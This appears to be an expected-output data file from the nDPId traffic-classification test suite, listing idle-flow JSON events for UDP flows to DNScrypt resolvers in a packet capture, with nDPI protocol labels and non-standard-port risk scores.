+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
